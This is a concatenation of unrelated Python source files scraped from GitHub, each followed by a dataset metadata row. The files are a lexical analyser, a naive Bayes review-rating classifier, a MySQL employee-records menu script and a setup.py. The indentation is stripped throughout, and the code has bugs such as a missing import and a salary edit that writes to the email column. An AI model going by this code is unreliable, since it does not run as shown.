from tkinter import *
from tkinter import messagebox as MessageBox
from tkinter import messagebox
#from Interfaz import datos
#resultReservadas = []
#resultCaracteresEspeciales = []
#resultDelimitadores = []
class analizador:
tokens = tokens()
def inicio_analizador(self, palabras):
resultReservadas = []
resultCaracteresEspeciales = []
resultDelimitadores = []
resultIndefinidas = []
resultErrores = []
resultDigitos = []
listResultados = []
print("--- Lexico ---")
for i in palabras:
if(i in tokens.reservadas):
resultReservadas.append(i)
palabras.remove(i)
if(i in tokens.caracteres_especiales):
resultCaracteresEspeciales.append(i)
palabras.remove(i)
if(i in tokens.delimitadores):
resultDelimitadores.append(i)
palabras.remove(i)
for g in range (len(palabras)):
dato = re.search("[a-zA-Z][a-zA-Z0-9_]*", palabras[g])
if dato:
resultIndefinidas.append(palabras[g])
else:
dato1 = re.search("^[0-9]+$", palabras[g])
if dato1:
resultIndefinidas.append(palabras[g])
else:
resultErrores.append(palabras[g])
print("Token Reservadas: ",resultReservadas)
print("Token Caracteres Especiales: ",resultCaracteresEspeciales)
print("Token Delimitadores: ",resultDelimitadores)
print("Token Indefinidas: ",resultIndefinidas)
print("Errores: ",resultErrores)
listResultados.append(resultReservadas)
listResultados.append(resultCaracteresEspeciales)
listResultados.append(resultDelimitadores)
listResultados.append(resultIndefinidas)
listResultados.append(resultDigitos)
listResultados.append(resultErrores)
return listResultados
| AngelHernandez20/Mantenimiento | analizadorlexico.py | analizadorlexico.py | py | 2,210 | python | pt | code | 0 | github-code | 36 |
484991740 |
# features - word cnt, character cnt, sentence cnt, word freq
import sys
import time
import json
import string
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
import numpy as np
import pandas as pd
porter = PorterStemmer()
stop_words = set(stopwords.words('english'))
train_file = "/Users/aparahuja/Desktop/IITD/ML/Assignment 2/Q1/reviews_Digital_Music_5.json/Music_Review_train.json"
test_file = "/Users/aparahuja/Desktop/IITD/ML/Assignment 2/Q1/reviews_Digital_Music_5.json/Music_Review_test.json"
if len(sys.argv) > 1:
train_file = sys.argv[1]
test_file = sys.argv[2]
train_data = pd.read_json(train_file, lines=True)
test_data = pd.read_json(test_file, lines=True)
vocabulary = set()
theta = {}
phi = {}
cnt = {}
m = len(train_data)
def F1_Confusion(y_true, y_predict):
confusion = np.zeros((5, 5))
n = len(y_true)
for i in range(n):
confusion[int(y_true[i]) - 1][int(y_predict[i]) - 1] += 1
# print("Confusion Matrix: ")
# print(confusion)
print("F1 scores:")
f1_avg = 0
for i in range(5):
tp = confusion[i][i]
fn = sum([confusion[j][i] if i != j else 0 for j in range(5)])
fp = sum([confusion[i][j] if i != j else 0 for j in range(5)])
f1_score = tp/(tp+(fp+fn)/2)
f1_avg += f1_score/5
print("\tClass " + str(i+1) + " = " + "{:.5f}".format(f1_score))
print("Macro F1 score = " + "{:.5f}".format(f1_avg))
def tokenize(review):
tokens = [w.lower() for w in word_tokenize(review)]
table = str.maketrans('', '', string.punctuation)
stripped = [w.translate(table) for w in tokens]
words = [porter.stem(word) for word in stripped if word.isalpha()]
return [word for word in words if word not in stop_words]
def findcharClass(n):
if n < 400:
return "$A$"
if n < 800:
return "$B$"
if n < 1200:
return "$C$"
if n < 1600:
return "$D$"
return "$E$"
def findwordClass(n):
if n < 100:
return "$A$"
if n < 200:
return "$B$"
if n < 300:
return "$C$"
if n < 400:
return "$D$"
return "$E$"
def findDenseClass(n):
if n < 4:
return "$A$"
if n < 8:
return "$B$"
if n < 12:
return "$C$"
if n < 16:
return "$D$"
return "$E$"
TokenizedReviews = []
def initializeModel(fcnt):
global vocabulary, theta, phi, cnt, TokenizedReviews
vocabulary = set()
theta = {}
phi = {}
cnt = {}
TokenizedReviews = []
for index, data in train_data.iterrows():
review = data['reviewText']
label = data['overall']
theta[label] = {}
cnt[label] = 0
phi[label] = 0
words = tokenize(review)
# convert to bigrams
bigrams = [words[i] + words[i+1] for i in range(len(words) - 1)]
if fcnt == 0:
TokenizedReviews.append(words + bigrams)
for word in words + bigrams:
vocabulary.add(word)
else:
TokenizedReviews.append(words)
for word in words:
vocabulary.add(word)
if fcnt > 0:
vocabulary.add("$A$")
vocabulary.add("$B$")
vocabulary.add("$C$")
vocabulary.add("$D$")
vocabulary.add("$E$")
vocabulary.add("UNK")
file = open("vocabulary_e.txt", "w")
file.write(json.dumps(list(vocabulary)))
file.close()
for label in theta:
for word in vocabulary:
theta[label][word] = 0
def learnParameters(fcnt):
for index, data in train_data.iterrows():
review = data['reviewText']
label = data['overall']
words = TokenizedReviews[index]
phi[label] += 1
for word in words:
theta[label][word] += 1
cnt[label] += 1
if fcnt == 1:
theta[label][findcharClass(len(review))] += 1
if fcnt == 2:
theta[label][findwordClass(len(words))] += 1
# avg word length
# theta[label][findDenseClass(len(review) / len(words))] += 1
for label in theta:
for word in vocabulary:
theta[label][word] = (theta[label][word] + 1) / \
(cnt[label] + len(vocabulary) + 1)
phi[label] /= m
def predict(words, label):
ans = np.log(phi[label])
for word in words:
if word in vocabulary:
ans += np.log(theta[label][word])
else:
ans += np.log(theta[label]["UNK"])
return ans
def findModelAccuracy(input_data, fcnt, datatype):
print("Running model on " + datatype + " data.")
correct = 0
total = len(input_data)
y_true = []
y_predict = []
for index, data in input_data.iterrows():
review = data['reviewText']
words = tokenize(review)
bigrams = [words[i] + words[i+1] for i in range(len(words) - 1)]
ans_label = data['overall']
ans, logProbab = "", - sys.maxsize
for label in phi:
if fcnt == 0:
prediction = predict(words + bigrams, label)
if fcnt == 1:
prediction = predict(
words, label) + 5*np.log(theta[label][findcharClass(len(review))])
if fcnt == 2:
prediction = predict(
words, label) + 5*np.log(theta[label][findwordClass(len(words))])
# avg word length
# prediction = predict(words, label) + 5 * np.log(theta[label][findDenseClass(len(review) / len(words))])
if logProbab <= prediction:
ans = label
logProbab = prediction
if ans_label == ans:
correct += 1
y_true.append(ans_label)
y_predict.append(ans)
F1_Confusion(y_true, y_predict)
print("Model " + datatype + " accuracy:",
"{:.2f}".format(correct/total*100) + "%")
features = ['single words + bigrams',
'single words + charcter count', 'single words + word count']
fcnt = 0
for feature in features:
print("\nTesting with feature - " + feature)
st = time.time()
initializeModel(fcnt)
learnParameters(fcnt)
en = time.time()
print("Training Time = " + "{:.2f}".format(en - st) + " sec")
# findModelAccuracy(train_data, "Training")
findModelAccuracy(test_data, fcnt, "Testing")
fcnt += 1
| AparAhuja/Machine_Learning | Naive Bayes and SVM/Q1/e.py | e.py | py | 6,378 | python | en | code | 0 | github-code | 36 |
23984522321 | def adde():
id = "id"
name = input('Employee Name : ')
lname = input('Employee Last Name')
email = input('Employee Email')
phone = input('Employee Phone Number :')
address = input('Employee Address :')
salary = input('Employee salary')
c_det = (id, name, lname, email, phone, address, salary)
qry = "INSERT INTO user Values (%s,%s,%s,%s,%s,%s,%s)"
# value of the fields to be entered with the query
val = c_det
db_cursor.execute(qry, val)
db.commit()
print('Customer details entered')
#adds a member to the sql server
def ved():
qry = """select * from user where id = %s"""
n = input("Write id")
cursor.execute(qry, (n,))
record = cursor.fetchall()
print(record)
#shows details of a member from the sql server
def ep():
qry = """UPDATE user SET salary = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the salary"))
n = input("Write the new salary")
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
#allows to the user to change the salary of the employee
def re():
qry = "DELETE FROM user WHERE id = %s"
n = input("Write id")
y = input("Are you sure?(Y/N)")
if y == "Y" or y == "YES" or y == "Yes" or y == "yes" or y == "y":
cursor.execute(qry, (n,))
db.commit()
print("Employee deleted successfully")
else:
exit()
#Removes a employee from the sql
def es():
if k == 1:
cursor = db.cursor()
qry = """select * from user where id = %s"""
h = input("Write id")
cursor.execute(qry, (h,))
record = cursor.fetchall()
print(record)
elif k == 2:
cursor = db.cursor()
qry = """select * from user where name = %s"""
n = str(input("Write name"))
cursor.execute(qry, (n,))
record = cursor.fetchall()
print(record)
elif k == 3:
cursor = db.cursor()
qry = """select * from user where lname = %s"""
n = str(input("Write laste name"))
cursor.execute(qry, (n,))
record = cursor.fetchall()
print(record)
elif k == 4:
cursor = db.cursor()
qry = """select * from user where email = %s"""
n = str(input("Write email"))
cursor.execute(qry, (n,))
record = cursor.fetchall()
print(record)
elif k == 5:
cursor = db.cursor()
qry = """select * from user where phone = %s"""
n = str(input("Enter phone number"))
cursor.execute(qry, (n,))
record = cursor.fetchall()
print(record)
else:
exit()
#searching in the sql a member by the data that the owner has
def em():
if k == 1:
all()
qry = """UPDATE user SET id = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the id"))
n = input("Write the new id")
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
print("Data change Successfully")
elif k == 2:
all()
qry = """UPDATE user SET name = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the name"))
n = str(input("Write the new name"))
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
print("Data change Successfully")
elif k == 3:
all()
qry = """UPDATE user SET lname = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the last name"))
n = str(input("Write the new last name"))
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
print("Data change Successfully")
elif k == 4:
all()
qry = """UPDATE user SET email = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the email"))
n = str(input("Write the new email"))
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
print("Data change Successfully")
elif k == 5:
all()
qry = """UPDATE user SET phone = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the phone"))
n = str(input("Write the new phone"))
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
print("Data change Successfully")
elif k==6:
all()
qry = """UPDATE user SET email = %s WHERE id = %s"""
j = int(input("Write id of Employee you want to change the salary"))
n = str(input("Write the new salary"))
cursor.execute(qry, (n, j))
record = cursor.fetchall()
db.commit()
print("Data change Successfully")
else:
exit()
#allows to edit employees data
def inl():
myresult = "SELECT id,name , lname FROM user;"
cursor.execute(myresult)
myresult = cursor.fetchall()
print(myresult)
#prints id,name,last name from sql
def all():
myresult = "SELECT * FROM user;"
cursor.execute(myresult)
myresult = cursor.fetchall()
print(myresult)
#prints all the data from the database
import mysql.connector as mysql
db = mysql.connect(
host="localhost",
user="root",
password="",
database="project"
)
db_cursor = db.cursor()
cursor = db.cursor()
print ("1) Add Employee.")
print ("2) View Employee Details.")
print ("3) Employee Promotion(Relates to salary increase).")
print ("4) Remove Employee.") #gives the user the choice of what he wants to do
print ("5) Employee Search.")
print ("6) Edit Employee.")
print("7) Exit.")
x =int(input("Choose"))
if x == 1:
adde()
elif x == 2:
inl()
ved()
elif x == 3:
inl()
ep()
elif x == 4: # using the functions
inl()
re()
elif x == 5:
k = int(input("1)id \n2)name\n3)lname\n4)email\n5)phone number\n"))
es()
elif x == 6:
k = int(input("1)id \n2)name\n3)lname\n4)email\n5)phone number\n6)address\n7)Salary"))
em()
| hsvac/HR_aplication | vladislav_donea.py | vladislav_donea.py | py | 6,253 | python | en | code | 0 | github-code | 36 |
19352159399 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
def read_file(file_name):
with open(file_name, "r") as f:
return f.read()
setuptools.setup(
name="influx-line-protocol",
description="Implementation of influxdata line protocol format in python",
long_description=long_description,
long_description_content_type="text/markdown",
version="0.1.5",
url="https://github.com/SebastianCzoch/influx-line-protocol",
author="Sebastian Czoch",
author_email="sebastian@czoch.pl",
license="MIT",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2",
"Operating System :: OS Independent",
],
packages=setuptools.find_packages(),
)
| SebastianCzoch/influx-line-protocol | setup.py | setup.py | py | 879 | python | en | code | 20 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.